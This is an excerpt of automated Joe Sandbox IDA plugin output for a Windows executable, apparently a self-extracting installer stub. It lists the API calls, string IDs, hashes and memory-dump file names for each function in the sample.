                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                              • String ID:
                                              • API String ID: 2466489532-0
                                              • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                              • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                              • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                              • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                              • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                              • wsprintfW.USER32 ref: 00407BBB
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                              • String ID: %d%%
                                              • API String ID: 3753976982-1518462796
                                              • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                              • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                              • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                              • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                              APIs
                                              • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$CharUpper$lstrlen
                                              • String ID: hAA
                                              • API String ID: 2587799592-1362906312
                                              • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                              • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                              • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                              • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                              • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 4038993085-2279431206
                                              • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                              • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                              • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                              • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                              APIs
                                              • EndDialog.USER32(?,00000000), ref: 00407579
                                              • KillTimer.USER32(?,00000001), ref: 0040758A
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                              • SuspendThread.KERNEL32(00000298), ref: 004075CD
                                              • ResumeThread.KERNEL32(00000298), ref: 004075EA
                                              • EndDialog.USER32(?,00000000), ref: 0040760C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: DialogThreadTimer$KillResumeSuspend
                                              • String ID:
                                              • API String ID: 4151135813-0
                                              • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                              • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                              • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                              • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                              • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                              • wsprintfA.USER32 ref: 00404EBC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$wsprintf
                                              • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                              • API String ID: 2704270482-1550708412
                                              • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                              • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                              • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                              • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                              • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                              • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%T/$%%T\
                                              • API String ID: 613200358-2679640699
                                              • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                              • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                              • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                              • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%S/$%%S\
                                              • API String ID: 613200358-358529586
                                              • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                              • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                              • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                              • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                              • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: %%M/$%%M\
                                              • API String ID: 613200358-4143866494
                                              • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                              • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                              • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                              • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                              APIs
                                              • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow
                                              • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                              • API String ID: 432778473-803145960
                                              • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                              • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                              • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                              • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                              APIs
                                                • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@$??3@$memmove
                                              • String ID: IA$IA$IA
                                              • API String ID: 4294387087-924693538
                                              • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                              • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                              • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                              • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                              APIs
                                              • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                              • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                              • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                              • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??2@??3@ExceptionThrowmemcpy
                                              • String ID: IA
                                              • API String ID: 3462485524-3293647318
                                              • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                              • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                              • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                              • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: wsprintf$ExitProcesslstrcat
                                              • String ID: 0x%p
                                              • API String ID: 2530384128-1745605757
                                              • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                              • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                              • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                              • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                              APIs
                                                • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                              • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                              • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                              • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$??3@
                                              • String ID: 100%%
                                              • API String ID: 2562992111-568723177
                                              • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                              • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                              • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                              • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                              APIs
                                              • wsprintfW.USER32 ref: 00407A12
                                                • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                              • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
